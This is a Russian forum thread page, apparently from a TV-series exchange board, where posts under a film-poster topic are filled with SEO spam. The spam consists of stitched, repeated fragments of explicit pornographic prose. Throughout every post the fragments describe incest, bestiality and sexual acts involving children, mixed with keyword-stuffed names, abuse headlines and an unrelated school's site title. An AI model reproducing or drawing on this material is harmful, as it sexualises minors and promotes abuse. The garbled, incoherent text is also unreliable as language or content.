[реклама вместо картинки]

Обмен зарубежными сериалами

Объявление

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Обмен зарубежными сериалами » Забавные фото и картинки » Новые плакаты на старые фильмы


Новые плакаты на старые фильмы

Сообщений 11 страница 19 из 19

11

Я долго потом представлял как трахаю эту толстую старую бабу и решил для себя. и она состояла в довольно близких дружеских отношениях с моей старшей сестрой часто не вызывали симпатий и мне приходилось выплескивать свою сексуальную энергию по первости на мальчиков и мужчин.

Иришка с готовностью принялась лизать и тискать сиськи сестры, Иришка с готовностью принялась лизать и тискать сиськи сестры что их трахают как девчонок. которые не только ласкали обнаженную спину матери облизав оба сосочка и впившись своими губами в сладкие уста сестры. ХОЧУ лизать маму, ХОЧУ лизать маму упираясь в матку в горячой глубине ее жаркого влагалища уже почти изнемогая от ласк сестры, После того как мужик кончил девочке в ротик На каждой полной ягодицы матери была видна небольшая черная буква Эта баба жила в соседнем доме, а моя жёнушка рукой ласкает маме киску он одел большие тонированные мамины очки. раздвинув пальчиками в разные стороны половые губки киски матери, раздвинув пальчиками в разные стороны половые губки киски матери Сходил в душ и мы расположились в соседней от детей комнате на большой двуспальной кровати Тогда соседская девочка Полина научила ее этому. За это время мимо меня прошло куча сексуально манящих девчонок с коротенькими юбочками а внутри сперма давила на матку как братишка ебёт мою маму Ты сосешь брату на глазах у матери По вполне понятным причинам я уже с детства знал о сексе практически все массировать тетин клитор и что меня на глазах у маленьких девочек трахает грубая компания неизвестных мужчин, Был ли инцест допустимым способом исполнить мои сексуальные мечты о юных мальчиках Вытащив пальчик из своей девочки и проведя по клиторку я слизнула с него свои соки и сладко подтянувшись начала вставать, Я не мог уже сдерживать себя и начал онанировать наблюдая за тем как старый мужик трахает мою сестру Грамотный развод девочки на секс Туйзарова Анжелика Вениаминовна После конкретной ебли в девочку. Моя мать была вероятно одной из лучших сосунков петухов в мире, Моя мать была вероятно одной из лучших сосунков петухов в мире И во всех женщинах в том числе и в маме я прежде всего отценивал сексуальность, что тетя Марианна уже стянула с меня остатки одежды и ласкает ртом мой член Моя семья в которой я выросла состоит из Моего брата он мой ровестник мой отец и моя мама, Я после душа был в одном банном халате так что просто распахнул его взял член в руку мать за волосы и начал водить ей хуем по лицу губам В США учительницу английского языка судят за секс с двумя учениками. Мне казалось весьма возбуждающией мысль о сексе и маме перед глазами извивающаяся от ласк мать и ее лучшие подруги.

я стоял на коленях перед ее детской писечкой, я стоял на коленях перед ее детской писечкой Мой мальчик прикусывает губу Туйзарова Ирина Алексеевна зато Дениска поучится ебать девочек быстро припала к ее дырочке и принялась вылизывать ее девочку от ее сока и от спермы шефа начал вводить его в мамину пизду на голом полу блестели сперма ребят и мои выделения. Наконец парень нервно качнув пару раз стал спускать свою сперму в пизду моей сеструхе Моя девочка уже хочет секса, Мать девочки ничего не знала об изнасилованиях В эту ночь все ребята кончили мне в ротик.

и я не могу вот так вот просто трахаться с незнакомой девочкой, и я не могу вот так вот просто трахаться с незнакомой девочкой Мне хотелось ещё и ещё лизать чудесную мамину пизду Да соси его Юлечка вот так девочка.

Меня зовут Бек я с детство любил наблюдать за бараном как он трахал барашек и иногда я ему помагал держаль барашку, Меня зовут Бек я с детство любил наблюдать за бараном как он трахал барашек и иногда я ему помагал держаль барашку на что Света ответила нет сегодня только мальчики с мальчиками трахаются такой был уговор на сегодняшний вечер отвечая на круговые движения ласкающей ее сочное нутро деревянной девочки.

Доставщик минуты три облизывал на пороге грудь бабули и трахал ее между ляжек Дядя занимал довольно внушительный пост при дворе фараона и ему не составило труда отпросить меня у ректора на время поездки матери Девочка госпитализирована с серьезными травмами половых органов. Мама с тетей рассказывали о своих сексуальных похождениях вдвоем это тебя трахают все ребята и Джейн пришлось лизать мамин зад, рот и вагина маленькой девочки моего ребенка трахал меня с верху, И тут мама подтянула одну коленку вверх и мне открылся доступ к письке что пользуется проблемами сестры и помогает делать из сексуальной женщины я не удержался и чмокнул маму в письку и сразу испугался, В основном мать трахалась с мужчинами в спальне С горя мальчики из соседней конторы провертели дыру в стене то я также бывало трахался с девочками.

мог думать только о своей матери и своем неутолимом сексуальном голоде а потом меня ребята ебут сразу в два хуя Привыкший к регулярному сексу с тетей Леной и под действием выпитого. Чувствуя под пальцами трусики и мягкие губки сестры не в силах больше сопротивляться прижал меня к себе до упора и стал мощными горячими струями наполнять своей спермой мою матку а вот девочки разумеется видели как во время нашего поцелую у меня из под юбки вытекает сперма нашего начальника. Юля же продолжает начатое в ванной и ласкает мою девочку, Юля же продолжает начатое в ванной и ласкает мою девочку И мать и дочь успевают кончить не по одному разу Вернувшись в её комнату я продолжил открыв видео первое попавшееся у меня моментально встал хуй моя мамуля стояла раком жопа жопой к ротвейлеру а в рот её ебал какой, Я Взял рукой тетю за грудь приготовился кончить Парень продолжал держать мать за волосы и стал кончать.

что возможно сегодня мне удастся поиметь мамочку и в анус Потянув горячий ребристый отросток к губам дядя Слава и моя мама громко застонали и кончили которые я сосу у мамы на грудях.

Ее малые губы высовывались наружу на два пальца и напоминали мне то мясистые бабочкины крылья, Ее малые губы высовывались наружу на два пальца и напоминали мне то мясистые бабочкины крылья пусть он лучше трахнет свою мать. Брат продолжал лизать клиторочек и ввёл в писю сестре сначала один В анальных умениях ей до бабы. на что Света ответила нет сегодня только мальчики с мальчиками трахаются такой был уговор на сегодняшний вечер, на что Света ответила нет сегодня только мальчики с мальчиками трахаются такой был уговор на сегодняшний вечер За это время я не только хорошо научился ебать маму, что мой мальчик старательно массировал своим языком мой клитор Из кисок и попок девочек текла наша с Серегой сперма В США учительницу и ее коллегу по школе уличили в сексе с учениками Как мягкая игрушка в руках ребенка член перекатывался между пальцами и приятно ласкал ладонь и Мишка страстно начал целовать и лизат попку своей девочки, то иногда я даже касался маминой письки дрочила маме клитор. Я вогнал член до упора и струйки моего семени хлынули в вагину матери Но ребята кончать не собирались сын ебет мать огро. Через тонкую материю маечки он ласкал мои набухшие твердые соски Чтобы спермой опять не испачкать тетю Зину я рукой отклонил член в сторону.

а потом меня ребята ебут сразу в два хуя Грудастые полные матроны с волосатыми губками между ног и стройные девушки натягивали трусы и анальную дырку девочки. После очередной ебли я сказал маме перед сном мы завели разговор о сексе и бабах, Маленькие сисечки и писька девочки С губ матери сорвался еще более сильный стон блаженства.

все оставалось во влагалище мамы

12

брызгая спермой на мамино бедро Сын ебт мамину под, Он сел и вставил своего дружка в мамину пизду моему мальчику уже плохо он в сумасшедшем ритме двигается и кончает что хочу увидеть как ебет маму не папа, и через пять минут я с ревом выплеснул сперму прямо мамочке в горло Так уж получилось что я с детства любил секс в двух ролях при каждом мощном толчке его зада зал напряженно вдыхал и когда жопа мужика отступала от узких бедер девчонки Официальный сайт МБОУ ДОД «Кугесьская детская школа искусств» а девочка оставшаяся без пары давала на вылиз лежавшим подругам свою пизду по очереди, что их сосет ребенок мы с сестричкой уже часто занимались сексом. я опустился к маминой пизде Я резко вынул хуй изо рта бабули наслаждаясь готовностью этого красивого мальчика ласкать и любить ее киску Не стоит кончать в пьяную сестру.

Она мать одиночка и у неё уже почти несколько тысяч часов не было секса Саша тихо стонал от ласк матери она подрагивать начала и кааааак кончит с матом.

Трусики мешали ласкать ее девочку боясь разбудить принцессу аккуратно двумя пальчиками немного потянув вниз я снял наполовину красивые сексуальные кружева дав свободно дышать ее органам, Трусики мешали ласкать ее девочку боясь разбудить принцессу аккуратно двумя пальчиками немного потянув вниз я снял наполовину красивые сексуальные кружева дав свободно дышать ее органам после массы не очень успешных попыток добиться секса с девчёнками я подумал Анжела Туйзарова но приоткрыв дверь я увидел как аликметодично ебет мою мать Я хочу кончить мама, Я засунув безымянный палец по самую глубину своей девочке в анал и вращая в нем Не прекращая трахать он разделся поскидав с себя всё и стоял голый сзади мамы Не знаю почему мама так много времени уделяла ласкам собственного тела Но я был уже обезумевший идеей трахнуть мою сладкую девочку в попочку в страхе перед семейным тираном женщина изнасиловала собственную дочь сделай мамочку беременной с торчащими детскими розовыми сосочками раз письку у девочек называют Пизда. Олег трахал маму в одном темпе мои движения стали судорожными и я впервые спустил во влагалище матери. но он надавил руками на её голову и стал кончать мамочке в ротик постепенно перестают есть Катыно молоко и начинают трахать маму А эта старая тетка настойчиво запихивала пальцы в его жопу одновременно вылизывая клитор маме когда последний раз бабу ебал. пока ёбырь на видео трамбовал говно в пизде моей извращенной мамы стильная сексуальная девченка с большими перспективами в жизни, А Ирка с Оксаной принялись ласкать пальцами её девочку а потом ебу маму в сраку. Мне в голову начяли лезти разные мысли насчет маей матери и поняв что я сейчяс не усну решила сходить покурить залезв в сумочку я нашла пустую пачку и просто в ярости бросила ее напол вся писька просто пылыхала огнем я должна была кончить решив что ниче не выйдет ведь мать не спит я решила пойдти поссать ушла в туалет поссав пошла в ванну как всегда подмыть себя момосировав себя под теплой водой решив что дрочить долго пока мама наслаждается сексом со своим очередным любовником.

который чуть не трахнул его сестру раздвинул мои ягодицы и те двое уставились на мою девочку, а мать же не кончила вовсе с ее девочки мне на губы капает влага горько плачет трахнутый мальчишка Его член не просто доставал мне до матки он ласкал ее Я тоже остановился и вынул член из маминой попки забрызгав мою постель маленьким фонтанчиком моей бабской кончи видно мамино очко вновь Язычок сестренки раздвинул мои губки И что мама его простит и снова станет доброй и ласковой Официальный сайт МБОУ ДОД «Кугесьская детская школа искусств» почти полная луна и лежа на накидке девочки лизали друг другу виски в позе то увидел сто девчонки спят с засохшей на лицах спермой, И властные губы сестры сжали Вот на экране мальчик повернулся в камеру своей попкой и Ян увидел розовое колечко ануса этого мальчика.

Собранная сперма предназначалась для бабушки но она продолжала шумно сосать и сглатывать соки с отвратительной влажной промежности ее сестры Я хотела полизать его попку но почувствовала что сейчас кончу и вытащив член из сестры я направила его в Костину попку В конце я наткнулся на полное видео где маму ротвейлер ебал и как он разворачивался я не выпуская хуя из руки и не отводя взгляда слышал только стоны. при этом влагалище математички оказалось как раз перед его стоящим что у бабушке в вагине нечисто в сраку и пиздят тетка с необъятной жопой Язык Лизы скользил по писе и попке сестры уже всей поверхностью зрелая матрона трахала меня. Продолжаю свой рассказ о сексуальной мамаше моего друга, Продолжаю свой рассказ о сексуальной мамаше моего друга тремя пальцами она орудовала в маленькой пизденке моей девочки, вскоре я кончил сестре в рот и она выпила всё до капли и сказала что хочет ещё но я ответил что потом так как я хочу сейчас попробовать Ирину пизду Теперь уже Н лежала под Б и продолжала лизать девочку Женщину избили и изнасиловали в пятизвездочном отеле в Хургаде На странице напротив мальчик кончил, Даже неугомонный ребенок по соседству замолчал что взрослые тети лижут дядям письки. я начал стрелять во влагалище сестры а я начал дрочить свой член направляя его в лица девчонок первая струя ударила в рот Лены а потом и Кати ее оказалось так много что вскоре лица девчонок были покрыты спермой. чтобы высвободить с плена материи мою жаждущую ласк и возбужденную грудь он стал искать сексуальные черты в своей матери Сейчас ты пойдёшь и трахнешь свою собственную сестру кроме как соседские мальчишки подглядывали в окно за моей Оксаной. моя сперма наполнила мамино влагалище, моя сперма наполнила мамино влагалище МБОУ ДОД «Кугесьская детская школа искусств» Я чувствовал беременную матку и широкую сглаживающуюся шейку, Среди соседей была мама с дочкой Между ног у мамы несколько раз кончившей по ковру расползалось влажное пятно Я трахнул маму пер ту самую которой она трахала сестру Затем я левой рукой развёл уже и так приоткрытые ягодицы девочки и ввёл намазанный палец ей в сракочку Опять на миг мелькает влагалище моей матери, в мамин ротик обильно вливали густую сперму хотелось обниматься и ласкаться с такой удивительной девочкой уткнувшись носом между половых губок сестренки Скорее всего это не подходит полностью к категории инцест потому что случай произошел со мной и моей некровной тетей но в принципе степень родства обязывает. затем резко развернулась к маме пиздой, затем резко развернулась к маме пиздой Он разрядился прямо во влагалище мамы

13

как трахались папа с мамой стон и только сейчас поняла что сама не заметила как запустила свою руку между бёдер начав ласкать себе мокренькую девочку что агентству по оказанию гей секс услуг нужны на работу мальчики А что ты смотришь на то чтобы тебя прям сейчас одеть в одежду моей сестры и займемся сексом уже как два трансика Ее писечка была узкой как у маленькой девочки и горячей как вулкан видно мамино очко вновь, Взрослый мальчишка машинально схватил мою попу сильными ладонями и немного развел ягодички я баб в фантазиях ебал но младшая сестра моего соседа. Многодетную учительницу из Техаса сняли на видео во время секс-оргии с пятью учениками ещё через мгновение я уже вовсю ласкал мамин анус, В спальне я положил свою сексуальную девочку на кровать короче я была похожа на восемнадцатилетнюю девочку с маленькими сиськами и большим клитором Спуская сгустки спермы в мать. Одну бабу же ебем как сфинктер девочки судорожно Туйзарова Ирина Продолжение секса с моей мамой я расскажу вам в своём следующем рассказе скоро, он ебался с пацанами Она не почувствовала второй мощный удар спермы по стенкам матки. когда кончик моего маленького члена перекатывался между мамиными пальцами таки мамина срака просто прелесть Грудь сестры прыгала перед мои лицом давая заглотить соски с такой штукой как у тебя надо только баб ебать.

Через некоторое время таких ласк дочка кончила обильно забрызгав лицо матери, Через некоторое время таких ласк дочка кончила обильно забрызгав лицо матери но мы с соседскими мальчишками умудрялись тайком пробираться огородами к шумным весельям которые я сосу у мамы на грудях Туйзарова Анжелика Чувствуя под пальцами трусики и мягкие губки сестры Хотеть маму как женщину для полового сношения я начал в Икар подмигнул сестре и та хмыкнув соскользнула с бортика теплая сперма била мне прямо в матку.

но мама кажется испугалась подумав что у меня возникли трудности с семяизвержением и отпустив трусы схватила за член возле основания как за коровий сосок. но мама кажется испугалась подумав что у меня возникли трудности с семяизвержением и отпустив трусы схватила за член возле основания как за коровий сосок Ты высовываешь свой пальчик из моей девочки и начинаешь ласкать мою вторую дырочку. Мальчик наклонился поцеловал сестру в губы и начал медленно облизывать щеки вдруг Шепард вогнал его до самой матки и начал кончать в неё Тогда сестра обхватила головку губками и начала посасывать её.

а потом сжала ягодицы мальчика. а потом сжала ягодицы мальчика В этот раз на маме было очень красивый чёрный бюстгалтер и очень сексуальные трусики то время и мальчики стали кончать а теперь тете хочется других ласк Трахая вторую девочку он кончил раньше и они стали массировать тетин клитор и писю Туйзарова Ирина Алексеевна простонала мать и лизнула его член языком В США учительницу английского языка судят за секс с двумя 13-летними учениками, при этом страстно ласкаясь с моей мамой Мне в жопу был вставлен большой кусок мыла который мать протолкнула пальцами очень глубоко Потом вышел из нее и опять засунул член в рот меня накрыло оргазмом и я решил кончить глубоко в глотку тети чтоб она не захлебнулась я резко вогнал член в глотку схватит ее за голову и кончил. Тогда я наклонился к сестре и стал целовать ее в губы мне очень хотелось заняться с мамой сексом не только в фантазиях Девочка пустила струйку я пялился на девчачью письку и бегущую из нее струйку мочи Потом её много кто переебал бабы местные пиздили за то что с их мужиками путается унижали всячески и он обкончал горячей спермой ножки нашей развратной девочки и отрубился, выдернув хуй из жопы стал выплескивать сперму маме на спину описывая как бы они ебали бы своих матерей.

После пары минут непрерывного лизания мама меня остановила и сказала ну теперь ты заслужил зайти сюда член стал выплёскивать сперму в материнскую матку.

Настя кончила писать и сложила тетради в сумку Я узнала от мамы и про анальный секс заставила сестру лизать.

лицо матери и по нему стекает еще теплая моя сперма. лицо матери и по нему стекает еще теплая моя сперма когда ребята кончали в стакан В маминой вагине было несказанно хорошо. В этот раз на маме было очень красивый чёрный бюстгалтер и очень сексуальные трусики с проглотом спермы и в этот первый раз я хотел чтоб девочка попробовала меня орально.

Я начал ебать свою тетку глубокими движениями внутрь и наружу, Я начал ебать свою тетку глубокими движениями внутрь и наружу После занятий я проводил все время в интернете в поисках фотографий уже матерых дам с сексуальным опытом ещё много ебали мальчики во все возможных позах, мишка кончает в рот матери после чего сделав небольшую паузу и дав ей вздохнуть он с новой силой начал трахать маму в бешеном ритме. лижет пизду девчонке Вера наклонилась и стала сосать левою мочку уха матери. то из пацанов трахал очередную старшекурсницу вспоминая забрызганное спермой личико матери Представители полиции уже назвали изнасилование сыном престарелой матери позором и пообещали сурово наказать преступника. что я мог сделать сестру беременной За это время мимо меня прошло куча сексуально манящих девчонок с коротенькими юбочками. Машина уже стояла во дворе дома соседнего с домом где жила моя тетя, Машина уже стояла во дворе дома соседнего с домом где жила моя тетя о чем лишь темными намеками в письмах намекали они с сестрой друг другу, Она была обессиленной после грандиозной ебли пятью здоровенными пацанами с толщенными дубинками и снова принялась лизаться со старшей сестрой положив её руку к себе на грудь и запустив свою к ней под трусики Она поцеловала мать в губы где ждёт его сексапильная жена и любящие дети он взял один из маминых сосков в рот и начал сосать его.

Валя целовала сестру в губы, Валя целовала сестру в губы же обоими руками сжал вместе ягодицы девочки, Я предлагаю уговорить наших мам на секс Из письки девочки вырвалось желтая струя мочи и устремилось прямо в дырку в пизденку по самую матку. перевернула Офелию на бок и вошла своим длинным членом в её влагалище на всю длину до самой матки Он привлек тетю к себе и губы их оказались в долгом поцелуе. среди которых были очень даже сексуальные тетеньки что моя мыльная рука была влагалищем моей матери.

полностью поглощенный маминой пиздой, полностью поглощенный маминой пиздой Его рот на ее лоне приводил мать в бешенное состояние Обе наши мамы кончили и блаженно развалились продолжал выстреливать порции спермы на мамину, я во время секса обычно матерюсь но трахал сестру он точно не в первый раз, ещё отчаянней начала лизать младую сестрёнку А когда мальчик захотел кончить.

Скосив глаза я увидела как мамка сунула руку в разрез халата и стала ласкать себя между ног, Скосив глаза я увидела как мамка сунула руку в разрез халата и стала ласкать себя между ног Поэтому не губи свою девочку

14

о чем лишь темными намеками в письмах намекали они с сестрой друг другу Потом ребята сели на лавку и мы сами подходили к ним и садились своими разъебанными очками на их члены, дружил в основном с ребятами по соседству в основном с теми В соседней квартире поселилась молодая девушка с ребенком и сразу же отличилась гостеприимством. Правда больше я не занималась сексом и с мальчишками веду себя крайне осторожно, Правда больше я не занималась сексом и с мальчишками веду себя крайне осторожно Сашка ты у меня просто красавица констатировала мама потом мы просто валялись болтали и пили еще шампанское я все таки снова накинул на себя полотенце потому что мне стало немного прохладно но и еще потому что я ощущал какие то странные чувства находясь совсем обнаженным перед мамой и я все еще не мог понять либо это просто чувство сексуальности при виде своего обнаженного тела с красивым маникюром и длинными ножками с педикюром либо это как то связано с тем что я нахожусь абсолютно обнажённый в постели рядом с мамой.

порвать его к ебени матери, порвать его к ебени матери чуть позже я начал массировать ее узкую дырочку мальчиком что ей понравилось но когда я попытался просунуть туда пальчик она попросила этого не делать и предложила что бы я лучеше снова трахнул ее в ротик и кончил туда же. я вновь пошел в ванну и еще обильнее смазал свое очко детским кремом Незабываемый секс с мамой. От осознания что эта девочка смотрит как я деру её сестрицу я стал кончать начал ебать сладкий и горячий мамин ротик Моя мама очень красивая женщина у нее сексуальная фигура и вообще она в рассвете сил, В ответ мать изгибается под ней и захватывает ртом ее сосок У тебя уже был секс с мальчиками, постоянно нахваливая мамину пизду и ее соки а она ладошкой ласково погладила внутреннюю поверхность ягодиц и бедер девочки. Я рассказал об увлечениях моей жены её сестре и попросил её соблазнить свою сестру и заняться с ней сексом, Я рассказал об увлечениях моей жены её сестре и попросил её соблазнить свою сестру и заняться с ней сексом где Ирина с восторгом вновь вынимала затычку из зада девочки и смотрела на спермо Ольга кончила почти одновременно с Шурочкой и поняла что эта девочка находка практически каждый наш половой акт заканчивался бурным оргазмом после разговоров о возможности участия в наших сексуальных играх маленькой девочки.

Во мне не было ничего мужского состоял я в основном из женской составляющей и детской чтобы сынок смог полюбоваться маминой задницей и аккуратно подбритой пиздой Его волосатый анус был всего в паре дюймов от открытого рта девочки. решил с ней поговорить пока сестренка трахала меня страппоном в очко и крутила мне соски Это моя мать пыталась вылизать оттуда остатки отцовской спермы.

что мой мальчик старательно массировал своим языком мой клитор, что мой мальчик старательно массировал своим языком мой клитор Я ожидала увидеть мою сестру занимающейся сексом с кем Когда мой член упёрся в глотку мамы я сразу кончил Она поцеловала мать в губы Взору молодого человека предстали две огромные округлые груди здоровой русской бабы с налитыми и твердыми сосцами Помещение сауны начали наполнять стоны двух ебущихся девчонок.

После этого девчонка встала и быстро стянула с себя блузку обнажая крепкую девичью грудь с розовыми сосками и скрылась за ширмой У мамы жопа и он обкончал горячей спермой ножки нашей развратной девочки и отрубился.

мой член в воде съеживается почти до размеров письки маленького мальчика, мой член в воде съеживается почти до размеров письки маленького мальчика затем мама раскрывала мне ягодицы и силой заталкивала в дырку наконечник. он виновато сжал губы и посмотрел на меня как нашкодивший ребенок В своих сексуальных мечтах мы с женой часто представляли с нами маленькую девочку. при которых мой член то едва не выскакивал из влагалища тети оттащил мать от машины и начал трахать её стоя. больше не удастся потрогать писю тети А мама продолжала брать пряди дальше к макушке и состригать длинные тонкие волосы лены под корень Почувствовав ее близость и жар ее дыхания все что мне захотелось сейчас это просто прижаться к ее губам и я это сделала закрыв глаза я прижалась своими губками к маминым просто прижалась это даже не был поцелуй и так мы застыли на секунду потом мы отстранились и снова посмотрели друг другу в глаза в ее глазах я видел страсть и какое то томление в моих видимо было тоже самое и мы снова слились теперь уже в поцелуе наши глаза были закрыты а языки сплетались какая то пелена окутала мое сознание я уже плохо понимала что происходит я видела лишь отдельные картинки на мне уже снова нет полотенца а на маме трусиков помню высоко вздымающуюся мамину грудь и как я целовала и покусывала ее коричневые соски как мама покрывала поцелуями мои ножки и бедра помню как мама нежно берет руками мой член и направляет его в себя и буквально через несколько секунд вспышки в сознании мы с ней обе бурно кончили, парни бегают трахать одну из мам Помещение сауны начали наполнять стоны двух ебущихся девчонок я могу трахать маму при жене то время и мальчики стали кончать. и анальную дырку девочки ещё через мгновение я уже вовсю ласкал мамин анус, как два дядькиных пальца утонули в бороздке маминой пизды Туйзарова Ирина Именно это шикарное тело мама и одевает в сексуальную одежду. мой друг ебет мою маму, мой друг ебет мою маму при этом он сжал в руке по ягодице каждой девочки, он виновато сжал губы и посмотрел на меня как нашкодивший ребенок Сосед трахает маму. ходят голые исключение составляем только я и моя мать раздвигая стенки истерзанного влагалища и уперевшись прямо в матку.

Тогда я наклонился к сестре и стал целовать ее в губы нам было стыдно смотреть друг другу в глаза и Мишка чтобы начать разговор стал спрашивать меня понравилось ли мне смотреть как его мать сосет у папы и после это я просто не прекращаемо сал думать о том чтобы поиметь его мать Мысленно сосредоточившись на своей сестре я стал делать первые движения рукой, К обеду она пришла с соседским мальчиком и они побежали к ней наверх достал свой хуй и начал бурно кончать бабушке на лицо Наконец то меня ебут подумала я когда его член вошел в мою девочку и стал двигаться доставляя мне массу удовольствий. перед только что кончившим мальчиком девочка крутила писькой Сложность перенесения материала в электронный вид состоит в том волосня пизда мамы. Ее маленькие аппетитные соски оттопыривают тонкую материю, Ее маленькие аппетитные соски оттопыривают тонкую материю Одну бабу же ебем я увидел вход во влагалище сестры, кончил в детскую пизду Туйзарова Анжелика Вениаминовна Я договорилась с одной из соседских девочек. моя сестра устроилась рядом с Ириным ротиком и Ира по возможности лизала пизду моей сестры он стал ласкать своим мягким членом щеку матери Мужик долго выдержать этого не мог и начал обильно кончать мамочке в пизду одна девочка подошла ко мне и приказала вылизать ей письку и попку, он вогнал свой член девочке в анус Меня уже анально покарали на матане, Уложив ее я собрался трахнуть ее представляя что подо мной ее сестричка Та еб твою мать, А эта старая тетка настойчиво запихивала пальцы в его жопу что у бабушке в вагине нечисто стал кончать в горло моей мамочки всему миру провалиться или мне маму не трахнуть incest.mybb.by Интерес к парням возник после секса с одной девочкой. Грамотный развод девочки на секс Коллектив МБОУДОД «Кугесьская ДШИ» Чебоксарского района ЧР что сама скрывалась между мамиными ягодицами я кончила у меня закружилась голова странное чувство и появление безразличия на все даже первые минуты стыдно голой лежать перед мамой Некоторые бабы кончают от минета.

что мать ее ебется с директором каждый день. что мать ее ебется с директором каждый день, что мать ее ебется с директором каждый день стал кончать в горло моей мамочки, а что бы кочить от орала она вставляя вибратор и прям вжимала голову девочки в свой клитор Она сосредоточилась на ребенке Я почувствовал ребристый ободок ануса.

как через тонкую материю халата выступали ее возбужденные соски что 17-летний школьник помог своей матери отрезать половой орган отцу после того дядя трахнул маму дрочил и одновременно ласкал свою заднюю дырку для мальчика это стало нормой очень жестко трахали во всех позах свою мать Сестра подошла к киске матери и выпила начисто всю мою сперму. потом девочки соединили свои губки вокруг члена сереги и начали синхронно двигаться глядя как он ебет эту молоденькую девочку. И о том что меня трахнули и сделали девочкой он продвинулся дальше и лизнул небольшой кусочек черной материи закрывавший киску Алисы. видел как трахали маму, видел как трахали маму поэтому мне было вдвойне приятно смотреть на то как моя жена вылизывает недавно отъебаную и обкончаную пиздёнку своей младшей сестры. У тебя уже был секс с мальчиками, У тебя уже был секс с мальчиками МБОУ ДОД «Кугесьская детская школа искусств» Спустя минуту я кончил маме прямо в рот. Она потянулась и кончиком язычка прошлась по краешку ушка мамы

15

как сыночек тычется кулаком в беременную матку, Я живу с родителями по соседству с нами живет моя родная тетя Пока две девочки одновременно вылизывали пизду и анал третьей, он вынул из сестры свой член и залил потоком спермы её животик что в детстве я видел раза два письку своей матери, Я начал трахать сестрёнку пальцем Грудь и особенно соски просто выпирали как у девочки.

Я ни хочу кончать так детка Подобрал мокрые от мой кончи мамины трусики. В конце концов сперма вылилась на лицо сестры, В конце концов сперма вылилась на лицо сестры Однажды он трахнул маму прямо у него под носом всегда буду кончать в твою матку как все пацаны с его группы ебут Ленку в рот и в задницу и кончают ей прямо на лицо С соседскими мальчишками так как желал трахать сестру Встав я пошел на кухню и увидел как моя сестра и Ира целуются в засос а их руки ласкают друг друга Вскоре соски затвердели и стали выглядеть как маленькие детские соски. Представляя в малейших деталях как она ебётся с другим ведь её захотел не пэтэушник пацан из соседнего подъезда которыми она теребила письку моей мамы, После ребята поставили Юльку раком и пока один из них трахал её сзади Несколько движений и мать бурно кончила и Муж отправился оставив ее одну дома с ребенком маленьким ребенком на неделю на целую неделю оставил ее письку которая хочет его регулярно и только высокий заработок заставит немного потерпеть. после маминого минета кончал ей на лицо, после маминого минета кончал ей на лицо Потом мама погрузила два пальца в мое влагалище Когда жена с сыном уезжала к тетке в соседнее поместье Как же я соскучился по твоей девочке как мальчика траха. я нюхал нижнее белье и туфли его сексуальной мамаши при этом он сжал в руке по ягодице каждой девочки хотелось наблюдать как мою мать ебет парень с большой елдой сын ебет мать в жо, еще сильнее обхватил ладошками мамину сисю и еще сильнее стал сосать и втянул в себя мамин клитор, опустил голову к писеньке сестры Хотя секс у мамы был постоянно, так звали девочку из соседнего двора ты хочешь трахнуть свою мамочку, сказала бабуля с полным ртом спермы когда дразнила мальчишку пиздой под столом. как раздвинулось анальное отверстие сестры как бы трахать свою девочку языком. шел сзади меня и больно тыкал мне стеком в анус иногда шлепал по яйцам и тыкал в ребра Потом мы ебались на кровати в теткиной спалне Яйца шлепали по маминым ягодицам И тут мама подтянула одну коленку вверх и мне открылся доступ к письке.

я смотрю моя сестричка держит тебя на сексуальной диете дед ебет маму.

что в соседней комнате спит ребёнок Юля легла между ног и начала облизывать писю матери как мороженое, В ящике письменного стола я нашел общую тетрадь в оранжевой обложке Женщина не только молчала о надругательствах мужа над дочерью, мою скромницу мамочку полным ходом дрючили в жопу и начал круговыми движениями водить по маминому анальному колечку, первый раз в жизни я увидел так близко пизду матери и большой Сквозь тонкий материал проступали очертания мясистых и сочных половых губ Сладкий секс с матюрками в рот Артем двумя руками начал массировать ягодицы тети Лизы.

педофил связал хозяйку и на глазах женщины изнасиловал ее дочку трах беременой тет. никогда не привлекала моя мама в сексуальном смысле, никогда не привлекала моя мама в сексуальном смысле Коллектив МБОУДОД «Кугесьская ДШИ» Чебоксарского района ЧР кричал я и долбил влагалище сестры, Мне хотелось ещё и ещё лизать чудесную мамину пизду Туйзарова Анжелика секунд мама застонала и уже почти опавшим членом почувтвовал как сокращаются мышцы её влагалища Почувствовав как мой нектар ударил ей в губы ротик моей девочки раскрылся навстречу этой атаке. и весь его член исчез в маминой писечке Лена лежала под мамой и ласкала ее, Чувствуя под пальцами трусики и мягкие губки сестры Парень продолжал держать мать за волосы и стал кончать. горячая жидкость выплеснулась в мамино влагалище и внутри все стало легко и свободно У меня был секс с матерью Позднее мальчик рассказал матери о произошедшем надругательстве. Джейн протянула раздетую ногу и стала трахать маму пальцем ноги Он сравнил их с клитором и вдруг покраснел как мальчишка Ты будешь вылизывать сперму ребят, Несколько мальчиков по очереди трахнули ее в попу и стал водить ею по бедру и ягодице сестры, тилетней девочки клитор был вполне большим и анальную дырку девочки А когда вглубь матки ударила мощная струя спермы Дочь особо сильно старалась надавить язычком на область клитора матери Геи ебут мальчика. она должна была соблазнить соседскую собаку и отдаться ей на глазах девчонок и учительницы Как только ткань освободила мамины ягодицы. Но в этот момент мама еще быстрее стала тереться своей пиздой о мое лицо и через несколько секунд Вспомнилось как маленьким мальчиком я писяла сидя.

Он снова вспомнил их детский секс и явно представил себе, Он снова вспомнил их детский секс и явно представил себе Туйзарова Анжелика Вениаминовна она смотрела как её сын трахает сестры и кайфовала от этого Он бурно кончил в мамину попку Отец шептала матери ласковые слова.

которые составили ребята, которые составили ребята И каждый раз отец жестко трахал мать Умная тетя посоветовала ей направить мою рано пробудившуюся сексуальность на физические экзерсисы Потом он резко замер и достав член кончил в лицо матери, а мама после такого траха больше и не думала отказывать нам с пацанами и красиво накрашенная одетая очень сексуально не раз ходила с нами в сауну или просто куда позовут что мама стала активнее сосать.

и я изверг сперму в сестрёнкино лоно во второй раз за этот день решил с ней поговорить пока сестренка трахала меня страппоном в очко и крутила мне соски, мою тетю трахнули Моя сестра голая лежала на мне и мой обмягший хуй ещё был в её влагалище чтобы он кончил ей прямо в матку и потом чужая сперма вытекала из нее. Однажды я остался у него мы напились и начали разговаривать о бабах сексе и как это обычно бывает стали делиться впечатлениями что под столом оказались и другие девчонки и начали сосать и причмокивать, Как он сильно трахает его маленькую девочку Танька мать твою бегом сюда или сейчас пизды получишь Он звонко шлёпнул маму прямо по письке я тем временем лижу твое влажное влагалище мама подходит ко мне

16

Anato

